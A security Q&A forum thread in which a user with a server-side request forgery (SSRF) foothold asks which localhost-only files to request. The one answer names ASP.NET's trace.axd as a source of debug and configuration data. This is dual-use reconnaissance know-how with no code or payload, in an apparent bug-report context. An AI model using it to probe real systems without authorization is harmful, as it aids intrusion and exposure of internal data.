If I was able to view any page on a website as localhost using SSRF, what files should I check for? I checked to see if I could view robots.txt normally, and I couldn't, but using SSRF, I was able to. What other files are typical on websites that are normally hidden to the public, but would be visible on the localhost?
Asked
Active
Viewed 120 times
0
-
I think robots.txt should be publicly accessible regardless, otherwise how would search engine spiders read it? – thexacre Jun 02 '14 at 00:42
-
@thexacre that's what I thought, but I guess this isn't the case. I've found this on two websites. One being Facebook-Studio. I reported it to Facebook and they fixed the issue. – Michael Blake Jun 02 '14 at 00:43
-
I can access the robots.txt on that site publicly, but perhaps they fixed it because of other implications - which is I suppose why you asked this question :P – thexacre Jun 02 '14 at 01:36
1 Answers
1
In a Microsoft environment, your best bet is probably the trace.axd file. This is often enabled and is set to local only so you would be able to access it from localhost.
http://msdn.microsoft.com/en-us/library/vstudio/bb386420(v=vs.100).aspx
This tracing info can include lots of debugging material, developer output and environment configuration data.
jamiescott
- 121
- 5
-
Thank you for that. Unfortunately I got a 404 for that file, but I found out that cgi-sys folder exists, so I'm assuming they're using Cpanel. – Michael Blake Jun 03 '14 at 01:25